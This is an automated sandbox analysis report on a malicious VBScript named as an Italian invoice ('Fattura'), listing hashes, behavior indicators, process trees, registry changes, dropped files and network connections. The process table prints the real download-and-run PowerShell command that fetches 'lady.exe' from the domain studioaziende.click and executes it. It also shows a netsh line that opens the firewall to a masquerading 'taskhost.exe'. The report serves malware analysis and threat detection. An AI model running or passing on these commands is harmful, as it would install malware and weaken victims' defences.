File name:

Fattura10.18.23.vbs

Full analysis: https://app.any.run/tasks/ba2be17e-4ecb-4a3a-9138-e2a92c676275
Verdict: Malicious activity
Analysis date: October 19, 2023, 08:35:23
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF line terminators
MD5:

CB6983E1DBAAF2391C9B4EA582E2B8C1

SHA1:

D3368CACCF096FE27B5C2B77E867E465F7D248D2

SHA256:

85BDF691DDBEEBF9A11FAA642FC7767507014483A7D43EDE19406BFE46B8969F

SSDEEP:

12:IhphphphphphphphphphphphphphphphphphphphphphphphphphphphphphphpW:PIMkUkUMt63Xe3cjCgvIMkUkUt

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • powershell.exe (PID: 3060)
      • lady.exe (PID: 1680)
      • cmd.exe (PID: 2764)
    • Application was dropped or rewritten from another process

      • lady.exe (PID: 1680)
      • viewer.exe (PID: 2576)
      • viewer.exe (PID: 2776)
    • Create files in the Startup directory

      • cmd.exe (PID: 2764)
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 2888)
      • powershell.exe (PID: 844)
      • powershell.exe (PID: 2744)
    • Reads the Internet Settings

      • wscript.exe (PID: 2888)
      • powershell.exe (PID: 1512)
      • powershell.exe (PID: 3060)
      • powershell.exe (PID: 2744)
      • lady.exe (PID: 1680)
      • WMIC.exe (PID: 1616)
      • viewer.exe (PID: 2576)
      • WMIC.exe (PID: 3064)
      • viewer.exe (PID: 2776)
    • Request a resource from the Internet using PowerShell's cmdlet

      • wscript.exe (PID: 2888)
      • powershell.exe (PID: 844)
      • powershell.exe (PID: 2744)
    • Application launched itself

      • powershell.exe (PID: 844)
      • powershell.exe (PID: 2744)
      • cmd.exe (PID: 2764)
      • cmd.exe (PID: 2112)
    • Possibly malicious use of IEX has been detected

      • wscript.exe (PID: 2888)
    • Powershell scripting: start process

      • wscript.exe (PID: 2888)
      • powershell.exe (PID: 844)
    • The Powershell connects to the Internet

      • powershell.exe (PID: 1512)
      • powershell.exe (PID: 3060)
    • Unusual connection from system programs

      • powershell.exe (PID: 1512)
      • powershell.exe (PID: 3060)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2764)
      • lady.exe (PID: 1680)
      • viewer.exe (PID: 2576)
      • cmd.exe (PID: 2112)
      • viewer.exe (PID: 2776)
    • The process creates files with name similar to system file names

      • cmd.exe (PID: 2764)
    • Executing commands from a ".bat" file

      • lady.exe (PID: 1680)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 2220)
      • cmd.exe (PID: 2436)
    • Uses WMIC.EXE to obtain data on processes

      • cmd.exe (PID: 2764)
      • cmd.exe (PID: 2600)
    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 2764)
      • cmd.exe (PID: 2600)
    • Uses NETSH.EXE to add a firewall rule or allowed programs

      • cmd.exe (PID: 2600)
    • Executing commands from ".cmd" file

      • viewer.exe (PID: 2576)
      • viewer.exe (PID: 2776)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 2764)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 2764)
      • cmd.exe (PID: 2112)
  • INFO

    • The executable file from the user directory is run by the Powershell process

      • lady.exe (PID: 1680)
    • Reads the computer name

      • lady.exe (PID: 1680)
      • viewer.exe (PID: 2576)
      • viewer.exe (PID: 2776)
    • Checks supported languages

      • mode.com (PID: 2680)
      • mode.com (PID: 2264)
      • viewer.exe (PID: 2576)
      • viewer.exe (PID: 2776)
      • lady.exe (PID: 1680)
    • Create files in a temporary directory

      • lady.exe (PID: 1680)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
73
Monitored processes
40
Malicious processes
8
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start wscript.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe powershell.exe lady.exe no specs cmd.exe cmd.exe no specs cmd.exe no specs reg.exe no specs wmic.exe no specs findstr.exe no specs viewer.exe no specs timeout.exe no specs cmd.exe no specs mode.com no specs cmd.exe no specs cmd.exe no specs reg.exe no specs cmd.exe no specs cmd.exe no specs mode.com no specs netsh.exe no specs netsh.exe no specs wmic.exe no specs findstr.exe no specs taskkill.exe no specs viewer.exe no specs timeout.exe no specs cmd.exe no specs timeout.exe no specs taskkill.exe no specs timeout.exe no specs taskkill.exe no specs timeout.exe no specs timeout.exe no specs timeout.exe no specs timeout.exe no specs timeout.exe no specs timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
284C:\Windows\system32\cmd.exe /c Set GUID[ 2>NulC:\Windows\SysWOW64\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
600timeout /t 20C:\Windows\SysWOW64\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\syswow64\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
796netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALLC:\Windows\SysWOW64\netsh.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Network Command Shell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\syswow64\netsh.exe
c:\windows\syswow64\ntdll.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
844"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $r = 'cd $env:TEMP ; powershell iwr -Uri https://studioaziende.click/madona.mp3 -o data.dat ; ; powershell iwr -Uri https://studioaziende.click/pink.mp3 -o lady.exe ; Start-Process lady.exe; ';powershell $iex($r)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
936timeout /t 2C:\Windows\SysWOW64\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\syswow64\timeout.exe
c:\windows\system32\wow64.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\system32\user32.dll
1200timeout /t 1C:\Windows\SysWOW64\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ntdll.dll
c:\windows\syswow64\timeout.exe
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\syswow64\version.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\imm32.dll
1220Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V DescriptionC:\Windows\SysWOW64\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\syswow64\reg.exe
c:\windows\syswow64\ntdll.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
1284timeout /t 20C:\Windows\SysWOW64\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\syswow64\timeout.exe
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
1296taskkill /im rundll32.exe /fC:\Windows\SysWOW64\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
128
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\syswow64\taskkill.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\lpk.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernel32.dll
1512"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iwr -Uri https://studioaziende.click/madona.mp3 -o data.datC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\kernel32.dll
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\kernelbase.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\lpk.dll
Total events
7 394
Read events
7 238
Write events
156
Delete events
0

Modification events

(PID) Process:(2888) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2888) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2888) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2888) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(1512) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\156\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3060) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\156\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2744) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2744) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2744) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2744) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
Executable files
15
Suspicious files
15
Text files
15
Unknown types
0

Dropped files

PID
Process
Filename
Type
1512powershell.exeC:\Users\admin\AppData\Local\Temp\data.datcompressed
MD5:A6244A2CCB3CB10F19F66A74B7E9AE19
SHA256:4DA74A42D11588679227D5C6573D693939638A796F0775A38055FEA997597153
2744powershell.exeC:\Users\admin\AppData\Local\Temp\urnzr5ix.rt4.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
1512powershell.exeC:\Users\admin\AppData\Local\Temp\1apaj5sv.tkp.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
1512powershell.exeC:\Users\admin\AppData\Local\Temp\omyxira0.h1p.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2744powershell.exeC:\Users\admin\AppData\Local\Temp\fl3zmvzv.u2n.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3060powershell.exeC:\Users\admin\AppData\Local\Temp\qh3kn0jy.4uv.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3060powershell.exeC:\Users\admin\AppData\Local\Temp\cw3grc2d.baj.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
844powershell.exeC:\Users\admin\AppData\Local\Temp\pj2yvjvo.m50.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
844powershell.exeC:\Users\admin\AppData\Local\Temp\fie4pe1r.4zi.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
1512powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
7
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
324
svchost.exe
224.0.0.252:5355
unknown
4
System
192.168.100.255:137
whitelisted
1956
svchost.exe
239.255.255.250:1900
whitelisted
4
System
192.168.100.255:138
whitelisted
1512
powershell.exe
188.114.97.3:443
studioaziende.click
CLOUDFLARENET
NL
unknown
3060
powershell.exe
188.114.97.3:443
studioaziende.click
CLOUDFLARENET
NL
unknown

DNS requests

Domain
IP
Reputation
studioaziende.click
  • 188.114.97.3
  • 188.114.96.3
unknown

Threats

No threats detected
No debug info